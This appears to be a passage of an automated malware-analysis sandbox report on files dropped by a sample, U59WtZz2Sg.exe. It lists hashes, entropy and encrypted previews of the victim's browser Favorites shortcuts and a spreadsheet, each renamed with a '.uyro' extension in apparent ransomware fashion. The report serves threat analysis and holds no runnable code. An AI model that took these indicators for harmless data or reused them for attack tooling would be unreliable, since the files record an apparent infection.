MD5:	C1AB862FBA1C47896C2054EC34C5A450
SHA1:	61B48CB7BA3841F887022F30BAB99699DD40A243
SHA-256:	CED706167E2442D3C25D134AB72797A6A5B013B686819180E855EDF2F2B18030
SHA-512:	330AD1CC83636370F30B52524B42DB8041852881E0B2EA475DA34B8C265819C63A31DA29BC9566FEDC8B0E6D4A52DA928D7D79E5105A252CE710A14F8CFE74A3
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC...].....!.U..R.....LfZ4.....v..y.\...g.u.....,xp\|............pF.....K..\|O'..M...O..[....R....TF..!q.N.B{a#..z......c....\|#....r9...!H..N.uHbJ..juc....I.....#..Wq}...10....F....,\-t.``.d....4W..e4[..0t7:F...O..[u...h..3V...B... .v.2.~.;.z..@.+.4'..y.G(.I.h._s].f.._..Z....s.qX.....g..\......\.]z...zL.C..1>....X.......c.....Pl..G.....+:.;s...=....\..R..\| n...9l.R.8....2....b.3..B..ruXBb.=\...T..'.....`.P...G.k8,./..Y.q.:rW.. .....a..O.Ye...G&)..0+.....W...(.v.+..../..\|..J.\|...8.(....w.d/...Edd.X..A...{..t..V.R......H.w.r...G.q&..0 ".B`k.l. ..GU.l.[..B..C.kj...l.m.$..x..i..{....RI..:..,f..\|....u........g....8K ._..sT....{..0.......\|$u..\|XOa#.g.....q& @....$3...K...4....X^. ..D;.......v..{ZQz. `....:.^K...F....i..........A<........:A.a.d.....y./..P.....L.^...T.).)9g.v1..@..\......l!.>:.!../..p......sT.UD:..A./B.\|..=..{.zS..D.p...B...=...~...Uw./e..3..S"vZ=jw.D............1.8...5....J......~.A.{=.."O.:.....(.k.....P.33..

C:\Users\user\Downloads\ZBEDCJPBEY.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851619718752142
Encrypted:	false
SSDEEP:	24:L+eRSIiby7ZM4NSIQscJ3EOW7+ytxloBBlUngu94+Lu88aFRGbcbD:L+LIaxAHgNEOW7nlqqUtvb2D
MD5:	C1AB862FBA1C47896C2054EC34C5A450
SHA1:	61B48CB7BA3841F887022F30BAB99699DD40A243
SHA-256:	CED706167E2442D3C25D134AB72797A6A5B013B686819180E855EDF2F2B18030
SHA-512:	330AD1CC83636370F30B52524B42DB8041852881E0B2EA475DA34B8C265819C63A31DA29BC9566FEDC8B0E6D4A52DA928D7D79E5105A252CE710A14F8CFE74A3
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC...].....!.U..R.....LfZ4.....v..y.\...g.u.....,xp\|............pF.....K..\|O'..M...O..[....R....TF..!q.N.B{a#..z......c....\|#....r9...!H..N.uHbJ..juc....I.....#..Wq}...10....F....,\-t.``.d....4W..e4[..0t7:F...O..[u...h..3V...B... .v.2.~.;.z..@.+.4'..y.G(.I.h._s].f.._..Z....s.qX.....g..\......\.]z...zL.C..1>....X.......c.....Pl..G.....+:.;s...=....\..R..\| n...9l.R.8....2....b.3..B..ruXBb.=\...T..'.....`.P...G.k8,./..Y.q.:rW.. .....a..O.Ye...G&)..0+.....W...(.v.+..../..\|..J.\|...8.(....w.d/...Edd.X..A...{..t..V.R......H.w.r...G.q&..0 ".B`k.l. ..GU.l.[..B..C.kj...l.m.$..x..i..{....RI..:..,f..\|....u........g....8K ._..sT....{..0.......\|$u..\|XOa#.g.....q& @....$3...K...4....X^. ..D;.......v..{ZQz. `....:.^K...F....i..........A<........:A.a.d.....y./..P.....L.^...T.).)9g.v1..@..\......l!.>:.!../..p......sT.UD:..A./B.\|..=..{.zS..D.p...B...=...~...Uw./e..3..S"vZ=jw.D............1.8...5....J......~.A.{=.."O.:.....(.k.....P.33..

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.49201690017007
Encrypted:	false
SSDEEP:	12:VawOlH3CJlpc0Hh8PCPdje85HdXhgMtcii9a:VzQSJlpceDe8ngybD
MD5:	91AB091DBAECE833CB2CDBAD0CBF4209
SHA1:	88B9FB8F9324ACCD59E208D9ED1D987AF6C533EB
SHA-256:	90CB7F0CB0AA60DE2102CB11EDA369C26D1F68EC6249CD63DA337CC920119333
SHA-512:	C6522F922FE626A15889E20DEAB47CF34D93B67BD3DEE43C4D9B33A6DC130C740DBEC81E348D5A21A084DAEB74CF2A21B4744A25ED5DF80B5602B5978BE1F75F
Malicious:	false
Reputation:	unknown
Preview:	[{000..{.yz.(..7.. O.......]_.Qi$u"..K.1ha.....l........Ef\|.4S.2.G.z4...(...Hlv4lla.^`r.i....H..4..Q...J..P\.Y...D.....H.g..>e...C...@.).5...\|.B.~.Z.9.E.W...s.X.5..i'.....d...U....r.............%..e?...z.J.}...B.. ....R.p....t..P.eQhJ...").W/.........P...Y-b.W:....8,..Hz..B+r.l...u...b..M...teo(...o.........C.(...z}.*.c..=...0y.\....#....7V.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Amazon.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.49201690017007
Encrypted:	false
SSDEEP:	12:VawOlH3CJlpc0Hh8PCPdje85HdXhgMtcii9a:VzQSJlpceDe8ngybD
MD5:	91AB091DBAECE833CB2CDBAD0CBF4209
SHA1:	88B9FB8F9324ACCD59E208D9ED1D987AF6C533EB
SHA-256:	90CB7F0CB0AA60DE2102CB11EDA369C26D1F68EC6249CD63DA337CC920119333
SHA-512:	C6522F922FE626A15889E20DEAB47CF34D93B67BD3DEE43C4D9B33A6DC130C740DBEC81E348D5A21A084DAEB74CF2A21B4744A25ED5DF80B5602B5978BE1F75F
Malicious:	false
Reputation:	unknown
Preview:	[{000..{.yz.(..7.. O.......]_.Qi$u"..K.1ha.....l........Ef\|.4S.2.G.z4...(...Hlv4lla.^`r.i....H..4..Q...J..P\.Y...D.....H.g..>e...C...@.).5...\|.B.~.Z.9.E.W...s.X.5..i'.....d...U....r.............%..e?...z.J.}...B.. ....R.p....t..P.eQhJ...").W/.........P...Y-b.W:....8,..Hz..B+r.l...u...b..M...teo(...o.........C.(...z}.*.c..=...0y.\....#....7V.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.543196666158331
Encrypted:	false
SSDEEP:	12:Df3HFYxRTqvMNQV8Pw3lQGbE6BarxKmG+dMRjtcii9a:DvHuk4m8PNOsjcJbD
MD5:	5B4F8DA35BDC2F4F27867B1DC09C936A
SHA1:	FB4BB1C85393D3559958330A436DFE23D6866D75
SHA-256:	FBFE86F5E7842FB72A93B715BDF3C7DB4F28B0A26D2399EA196515DEDC9F74D9
SHA-512:	6BA026476356DD10B9B1E4D4FC7B703C9A6753C16BFF979C7DEECFD071E67861D622F320771D6AE0636CE18D472E5FA0DD5DB7B8DC72C67A09DFEFCC2C49B617
Malicious:	false
Reputation:	unknown
Preview:	[{000?....?..i.H.d..!".>...F.....I..+\[&....?.953e!.Q...a.f.'...^.Z.0....;x.E..zuT....z....o2..y.z....,q;..B.....w.5.5.m..O..b2\.L?`F.m..Y\|...2..A.....1..K..F...Fu.)?..@m&.6.f,.5..6....S....,E..&....X[5...Z.....o.H..5+j5X=.R$R.C..z..t.klBuTq..L..............i..+..3..qD.&H.q.HY.-&=.Td..<\|H.$?f...J..Y.p.........n.M....#8.$U.....).l.3.3.:/!......8.K..af[......R.{..3.%..........mm.- %...2U...>....vN%.VLj.:B..+q.\|...k..b...:.)*.p..~..;/.aK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.543196666158331
Encrypted:	false
SSDEEP:	12:Df3HFYxRTqvMNQV8Pw3lQGbE6BarxKmG+dMRjtcii9a:DvHuk4m8PNOsjcJbD
MD5:	5B4F8DA35BDC2F4F27867B1DC09C936A
SHA1:	FB4BB1C85393D3559958330A436DFE23D6866D75
SHA-256:	FBFE86F5E7842FB72A93B715BDF3C7DB4F28B0A26D2399EA196515DEDC9F74D9
SHA-512:	6BA026476356DD10B9B1E4D4FC7B703C9A6753C16BFF979C7DEECFD071E67861D622F320771D6AE0636CE18D472E5FA0DD5DB7B8DC72C67A09DFEFCC2C49B617
Malicious:	false
Reputation:	unknown
Preview:	[{000?....?..i.H.d..!".>...F.....I..+\[&....?.953e!.Q...a.f.'...^.Z.0....;x.E..zuT....z....o2..y.z....,q;..B.....w.5.5.m..O..b2\.L?`F.m..Y\|...2..A.....1..K..F...Fu.)?..@m&.6.f,.5..6....S....,E..&....X[5...Z.....o.H..5+j5X=.R$R.C..z..t.klBuTq..L..............i..+..3..qD.&H.q.HY.-&=.Td..<\|H.$?f...J..Y.p.........n.M....#8.$U.....).l.3.3.:/!......8.K..af[......R.{..3.%..........mm.- %...2U...>....vN%.VLj.:B..+q.\|...k..b...:.)*.p..~..;/.aK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.475975234035785
Encrypted:	false
SSDEEP:	12:tRuOw4m5A3eQwgt3AmMtoLBS2/Ko/izNuzJ+3Rtcii9a:tR9Y2xMtIS2So6z0d+3TbD
MD5:	52F3E500172C10E6CBC3E61EF3D87F4B
SHA1:	24BAC7CEC52DFCA5972E34B699A76E570D29CE86
SHA-256:	1AB188C7D904E09EE307EB351DAF2C76E5A4FEA980C90D51BAF59E0865EE8124
SHA-512:	2DB064B923FC81DA777934474EAE8566FFA9EABA1FABE180351851D029E5B80CF2F986223470042BE7646A008324874846C49C3CCC77DB32242D35FFFE665A09
Malicious:	false
Reputation:	unknown
Preview:	[{000...zf..4ad.u...e.=.........Z..Z..Aq..No.Rf.dS..]C.F...H._...H.Q`..t.D$!...R.u.I\..L....\|.]...Q.:.......>..?.$....Up>..X.........A...$.V.p.6.g.B.xe6d,Q&j..l..$.HynTL...{.YE..m....D+[r0..m.O...w.5.j?h5H9..%%..6.....D.......If.\.....h.B8...H..@<H]A.J.q..DS...........At......Mv.)@f....S_...V..C2b..u...&.:.!..Y(.\|V..2',.^Oc..U....e......$.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.475975234035785
Encrypted:	false
SSDEEP:	12:tRuOw4m5A3eQwgt3AmMtoLBS2/Ko/izNuzJ+3Rtcii9a:tR9Y2xMtIS2So6z0d+3TbD
MD5:	52F3E500172C10E6CBC3E61EF3D87F4B
SHA1:	24BAC7CEC52DFCA5972E34B699A76E570D29CE86
SHA-256:	1AB188C7D904E09EE307EB351DAF2C76E5A4FEA980C90D51BAF59E0865EE8124
SHA-512:	2DB064B923FC81DA777934474EAE8566FFA9EABA1FABE180351851D029E5B80CF2F986223470042BE7646A008324874846C49C3CCC77DB32242D35FFFE665A09
Malicious:	false
Reputation:	unknown
Preview:	[{000...zf..4ad.u...e.=.........Z..Z..Aq..No.Rf.dS..]C.F...H._...H.Q`..t.D$!...R.u.I\..L....\|.]...Q.:.......>..?.$....Up>..X.........A...$.V.p.6.g.B.xe6d,Q&j..l..$.HynTL...{.YE..m....D+[r0..m.O...w.5.j?h5H9..%%..6.....D.......If.\.....h.B8...H..@<H]A.J.q..DS...........At......Mv.)@f....S_...V..C2b..u...&.:.!..Y(.\|V..2',.^Oc..U....e......$.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.426625727461944
Encrypted:	false
SSDEEP:	12:g0BSuKTcS+r6r2RF2jUppDnA1DV7t05amZ2wtcii9a:FtEr28UpVA1Z7qEmIGbD
MD5:	98C171E3621BA704440831963A78537C
SHA1:	8473D01580392E2D0287A373374E23DF304B25D1
SHA-256:	87F3AA2A1139D4F24925A48C21F04D6315887E03AD8F48E1B91435561BA09B8A
SHA-512:	BCF9FCF195A93EFD00D43A8400F4D17146DC0512A0A785A3451F1CE9C2E55116AAB8424CAD023BB46954CBE20557CE5DF8AE2EB7058086ABB0F7A459C1B556C1
Malicious:	false
Reputation:	unknown
Preview:	[{000. ..`.....K.n^6_....x.E...X.{.J....Z...K.5..y.A4L. .}...I.O.W...lj....m...A..`.e...I.!B.#.uu.B.p.Q}...NM.F...@..Z&Cl;.x.._..Y.BSO[:q.^.v...O[ybF.X...C?W.....)..'.K.J.s.}d...y..6...F..y2.bK+p.G..\.Tr_..9.&0..n......NS.....'....k.}....%"l.+ .T.E...x. .6%xR...E..9.AD!..:....7..Z...%..i.n=..[).M..o.<..../.....]..{e..........w ....He..r.X.M.~9.D....hK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.426625727461944
Encrypted:	false
SSDEEP:	12:g0BSuKTcS+r6r2RF2jUppDnA1DV7t05amZ2wtcii9a:FtEr28UpVA1Z7qEmIGbD
MD5:	98C171E3621BA704440831963A78537C
SHA1:	8473D01580392E2D0287A373374E23DF304B25D1
SHA-256:	87F3AA2A1139D4F24925A48C21F04D6315887E03AD8F48E1B91435561BA09B8A
SHA-512:	BCF9FCF195A93EFD00D43A8400F4D17146DC0512A0A785A3451F1CE9C2E55116AAB8424CAD023BB46954CBE20557CE5DF8AE2EB7058086ABB0F7A459C1B556C1
Malicious:	false
Reputation:	unknown
Preview:	[{000. ..`.....K.n^6_....x.E...X.{.J....Z...K.5..y.A4L. .}...I.O.W...lj....m...A..`.e...I.!B.#.uu.B.p.Q}...NM.F...@..Z&Cl;.x.._..Y.BSO[:q.^.v...O[ybF.X...C?W.....)..'.K.J.s.}d...y..6...F..y2.bK+p.G..\.Tr_..9.&0..n......NS.....'....k.}....%"l.+ .T.E...x. .6%xR...E..9.AD!..:....7..Z...%..i.n=..[).M..o.<..../.....]..{e..........w ....He..r.X.M.~9.D....hK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.452770502898926
Encrypted:	false
SSDEEP:	12:dIZLHulTuS5vyEs7bXwk0VXB5P/tcii9a:+LHiTuSfgbXn0tBjbD
MD5:	6A40A3A75F1F6656DFE2E78C1BA51A82
SHA1:	B5E77A8DC2604F6E5F4152843A9B7B308C8AAB5F
SHA-256:	925529B8236C5C460950E07442811D704F3129789F2C5CCF91E2597853DD4C62
SHA-512:	3039C309FE253CB9DEAE4BB5A776750825E2DAF6B506A746CC145C2382C01A928279F14BB4AF5BC87C9F72F73177E5D5A5F69D9141904E3E7205DE471922B87F
Malicious:	false
Reputation:	unknown
Preview:	[{000.d.w."..{9......wo.....Nk.vkM9.....}..^...:..?;I..b.8..R...p....IY/=\|.H\|...X.U..$..o.....;.z..>..&....h=d.A.1o+...W.O..JIL.....F.H.yE.... E..&3..0..&.x..S..zK....V.....(....F.7kru........V\.N....\.h.ku...e...H...,...b.G.9..&..d.w.M;wI...A..y.h)GZ...&.z.z.....C.)...d........P#....%...A_}..d..@.x.]c.g+........T....Ps.rT.%R{...Ke6,K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.452770502898926
Encrypted:	false
SSDEEP:	12:dIZLHulTuS5vyEs7bXwk0VXB5P/tcii9a:+LHiTuSfgbXn0tBjbD
MD5:	6A40A3A75F1F6656DFE2E78C1BA51A82
SHA1:	B5E77A8DC2604F6E5F4152843A9B7B308C8AAB5F
SHA-256:	925529B8236C5C460950E07442811D704F3129789F2C5CCF91E2597853DD4C62
SHA-512:	3039C309FE253CB9DEAE4BB5A776750825E2DAF6B506A746CC145C2382C01A928279F14BB4AF5BC87C9F72F73177E5D5A5F69D9141904E3E7205DE471922B87F
Malicious:	false
Reputation:	unknown
Preview:	[{000.d.w."..{9......wo.....Nk.vkM9.....}..^...:..?;I..b.8..R...p....IY/=\|.H\|...X.U..$..o.....;.z..>..&....h=d.A.1o+...W.O..JIL.....F.H.yE.... E..&3..0..&.x..S..zK....V.....(....F.7kru........V\.N....\.h.ku...e...H...,...b.G.9..&..d.w.M;wI...A..y.h)GZ...&.z.z.....C.)...d........P#....%...A_}..d..@.x.]c.g+........T....Ps.rT.%R{...Ke6,K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.387731775799083
Encrypted:	false
SSDEEP:	6:J2DzS2QKGg1KXgPwLsb8jVqr8qdjZm42GhPgn17CrlREVRR6i+fDonS3kdHb/42X:ZXwKXPaoQhblSE3oS3+j0wtcii9a
MD5:	EE5B9693B2DF346E49BAE22B263A75F5
SHA1:	9268A34D520299E7AB7FF6CF9A5DE78EE4048B60
SHA-256:	9CC97CC6BF541E895FF0B6DF2A5806C3CD7055F58A67E9D4F48D8CA0D734473C
SHA-512:	ADA82F7522AF7FA48F7D8EF9132F6D1EC42B425F606249811B5DDE48C17722A73577F73C7630D14A3A914C6D3574EE73629AB8F6CAA43676D27E056D955F6BCF
Malicious:	false
Reputation:	unknown
Preview:	[{000....9A.[.E.u.w'..y...k.=...i....K...O....~-...+.T..(r.'....3O2..JAJB}.U.1+.\....%@.Q.\|R-\|Y@.Cm.#...~....Z:f.y.t7f.st...3e.2..Wq..I.}.c........X.C...\..+{F...0.f............Z.p..!..E.I.h.r.}......hm.A3..&Y....~.......8..2.s..)).,..b.G..06...y..Vu5.2..F.v.l....^..5......o...c...p..~u^......xA\|={.N.e[.(8..P...tjX&2...w\H5.M.wf.t.{/..&....q.bj...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.387731775799083
Encrypted:	false
SSDEEP:	6:J2DzS2QKGg1KXgPwLsb8jVqr8qdjZm42GhPgn17CrlREVRR6i+fDonS3kdHb/42X:ZXwKXPaoQhblSE3oS3+j0wtcii9a
MD5:	EE5B9693B2DF346E49BAE22B263A75F5
SHA1:	9268A34D520299E7AB7FF6CF9A5DE78EE4048B60
SHA-256:	9CC97CC6BF541E895FF0B6DF2A5806C3CD7055F58A67E9D4F48D8CA0D734473C
SHA-512:	ADA82F7522AF7FA48F7D8EF9132F6D1EC42B425F606249811B5DDE48C17722A73577F73C7630D14A3A914C6D3574EE73629AB8F6CAA43676D27E056D955F6BCF
Malicious:	false
Reputation:	unknown
Preview:	[{000....9A.[.E.u.w'..y...k.=...i....K...O....~-...+.T..(r.'....3O2..JAJB}.U.1+.\....%@.Q.\|R-\|Y@.Cm.#...~....Z:f.y.t7f.st...3e.2..Wq..I.}.c........X.C...\..+{F...0.f............Z.p..!..E.I.h.r.}......hm.A3..&Y....~.......8..2.s..)).,..b.G..06...y..Vu5.2..F.v.l....^..5......o...c...p..~u^......xA\|={.N.e[.(8..P...tjX&2...w\H5.M.wf.t.{/..&....q.bj...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.526581695726463
Encrypted:	false
SSDEEP:	12:OtM7mdGNq69N27SvC8ThwgiTgNg/WO/nOtcii9a:OC7UGo64oCgVSgNoWcobD
MD5:	A55D0AF5C8A845E01C891774273031F1
SHA1:	241EAC66F9949FDDDD04717F4C3D5EFCF5BD84B0
SHA-256:	FF44BDF57D7198A8E26F24DF7152E520378EBFA7185AFE6BF233D0ECA5A8B807
SHA-512:	57C875A79DBCC061689F7DB557ECE0524218CB1204F4565AC7CB15BC6F73699AFF434BD543AF8121F0F5089EE91991DE2E0BAAEC75E154713A1F71388933740D
Malicious:	false
Reputation:	unknown
Preview:	[{000..Y.....0G.../\....0.9y.r.rw..l9.E3...X.P~..}!...5^U,r1....#...p..A...\|./.\|.G.....Ww.....a.6=qh...o.7..V./...U...d2.B.w.!...pa..FL".......^.-...).AQ.....-.(..l..A....P.e...T}$..T..R9.8jSF '_ZS..>.vnr(..)..v.O..........5..f......]..+e... s].v...kI..6..Cj.\[fJ%"&.....h....mY.......=..h._.)........:..l+Y.O.s.{.......o.Ym.7d'..t.&J..7..~oj..H.......K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.526581695726463
Encrypted:	false
SSDEEP:	12:OtM7mdGNq69N27SvC8ThwgiTgNg/WO/nOtcii9a:OC7UGo64oCgVSgNoWcobD
MD5:	A55D0AF5C8A845E01C891774273031F1
SHA1:	241EAC66F9949FDDDD04717F4C3D5EFCF5BD84B0
SHA-256:	FF44BDF57D7198A8E26F24DF7152E520378EBFA7185AFE6BF233D0ECA5A8B807
SHA-512:	57C875A79DBCC061689F7DB557ECE0524218CB1204F4565AC7CB15BC6F73699AFF434BD543AF8121F0F5089EE91991DE2E0BAAEC75E154713A1F71388933740D
Malicious:	false
Reputation:	unknown
Preview:	[{000..Y.....0G.../\....0.9y.r.rw..l9.E3...X.P~..}!...5^U,r1....#...p..A...\|./.\|.G.....Ww.....a.6=qh...o.7..V./...U...d2.B.w.!...pa..FL".......^.-...).AQ.....-.(..l..A....P.e...T}$..T..R9.8jSF '_ZS..>.vnr(..)..v.O..........5..f......]..+e... s].v...kI..6..Cj.\[fJ%"&.....h....mY.......=..h._.)........:..l+Y.O.s.{.......o.Ym.7d'..t.&J..7..~oj..H.......K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.35679302730178
Encrypted:	false
SSDEEP:	12:YQkojkfK+0Fc0rAMGTATuUxOq+xT97hBcRTKRtcii9a:4okKtrAMWuugB+hqRIbD
MD5:	FA488FFB3E335FEE0AE97D7A4121E1F7
SHA1:	44DF7D1DACAB85152B9A125E21DAE993A24AE56A
SHA-256:	450F08AE992ACFE2D4525295D5498214F8D2DE99AC23B100701E16D3667184E4
SHA-512:	EB8DD331D3B61ABED824291C382681EBC41A6BA93D9E1F87E6DC8645B4E7722E9003A3396ED0BF02B327B57DE884211E8A21C05664E43F4B6A77AEE1324EB316
Malicious:	false
Reputation:	unknown
Preview:	[{000....W..nw.G.Q......bf.Eq..\..~..\r.R....x@......%.9E.<.E....Y.#......O.Y.....;....YN..?.....C....q...K6.....Sm..A.....F.c.3...)h....7....@.U.8...9.>.."xG..y...GA..v.....{.>...3U@'j....}.0....+.`AavGB......_.;.{.d.6..V.....w...'..~.<I..cJ.-..{X3'...#.:..K20.'..k\|.....iS.Z..'.]B.K.....Q..d.........x...<.....6D]O.v.....!it.3..FC.".z.j+...dyE.x.n....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.35679302730178
Encrypted:	false
SSDEEP:	12:YQkojkfK+0Fc0rAMGTATuUxOq+xT97hBcRTKRtcii9a:4okKtrAMWuugB+hqRIbD
MD5:	FA488FFB3E335FEE0AE97D7A4121E1F7
SHA1:	44DF7D1DACAB85152B9A125E21DAE993A24AE56A
SHA-256:	450F08AE992ACFE2D4525295D5498214F8D2DE99AC23B100701E16D3667184E4
SHA-512:	EB8DD331D3B61ABED824291C382681EBC41A6BA93D9E1F87E6DC8645B4E7722E9003A3396ED0BF02B327B57DE884211E8A21C05664E43F4B6A77AEE1324EB316
Malicious:	false
Reputation:	unknown
Preview:	[{000....W..nw.G.Q......bf.Eq..\..~..\r.R....x@......%.9E.<.E....Y.#......O.Y.....;....YN..?.....C....q...K6.....Sm..A.....F.c.3...)h....7....@.U.8...9.>.."xG..y...GA..v.....{.>...3U@'j....}.0....+.`AavGB......_.;.{.d.6..V.....w...'..~.<I..cJ.-..{X3'...#.:..K20.'..k\|.....iS.Z..'.]B.K.....Q..d.........x...<.....6D]O.v.....!it.3..FC.".z.j+...dyE.x.n....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.4352090194375515
Encrypted:	false
SSDEEP:	12:J9M20+rgIL9wu29EY0Wr5F7xCg2owku1Bsdtcii9a:J9d0knwu29Ks59kgvwr1Bs/bD
MD5:	FC1AD2C017BF9B4813034A40C65542CC
SHA1:	6E0CF656478B7EF5AC5DC063F89C60080CB4E9DF
SHA-256:	2FAF2887199B02641DA2A918D1E1869D579C04B12123EE266E53DAE9D530ABB4
SHA-512:	BD8BC68133BA7585C8049D2AA70933BD07E85ED1CA1ED959A8B079F90EE3FD0FAE51E596BD275FF07E8B982CE931768AE50725C7246ABE7BCBFAE7868CCC75CE
Malicious:	false
Reputation:	unknown
Preview:	[{000.....X'.2z....W!.......?.}.7N8#.H....%..]3<.....Q?...}.'.I&U.9{Shz.....&...z.......S...?..1..h......:9J;...f...=....).u..MvV......i..aNCU.....gf).eER.dT.$.....\|_.(.Wr.ojl.u...N:..%.$&g.9.P.H.....Z.i.D3.WL J.(7g...p..>.W=..%5C.3.......H.yr.c..UD.....el..).E..%.C>z..8-........e...n.<...N.j.8.c...`Lz.Y.bk..iA.kU...z......^.`U...0....W.I[......kL....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.4352090194375515
Encrypted:	false
SSDEEP:	12:J9M20+rgIL9wu29EY0Wr5F7xCg2owku1Bsdtcii9a:J9d0knwu29Ks59kgvwr1Bs/bD
MD5:	FC1AD2C017BF9B4813034A40C65542CC
SHA1:	6E0CF656478B7EF5AC5DC063F89C60080CB4E9DF
SHA-256:	2FAF2887199B02641DA2A918D1E1869D579C04B12123EE266E53DAE9D530ABB4
SHA-512:	BD8BC68133BA7585C8049D2AA70933BD07E85ED1CA1ED959A8B079F90EE3FD0FAE51E596BD275FF07E8B982CE931768AE50725C7246ABE7BCBFAE7868CCC75CE
Malicious:	false
Reputation:	unknown
Preview:	[{000.....X'.2z....W!.......?.}.7N8#.H....%..]3<.....Q?...}.'.I&U.9{Shz.....&...z.......S...?..1..h......:9J;...f...=....).u..MvV......i..aNCU.....gf).eER.dT.$.....\|_.(.Wr.ojl.u...N:..%.$&g.9.P.H.....Z.i.D3.WL J.(7g...p..>.W=..%5C.3.......H.yr.c..UD.....el..).E..%.C>z..8-........e...n.<...N.j.8.c...`Lz.Y.bk..iA.kU...z......^.`U...0....W.I[......kL....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

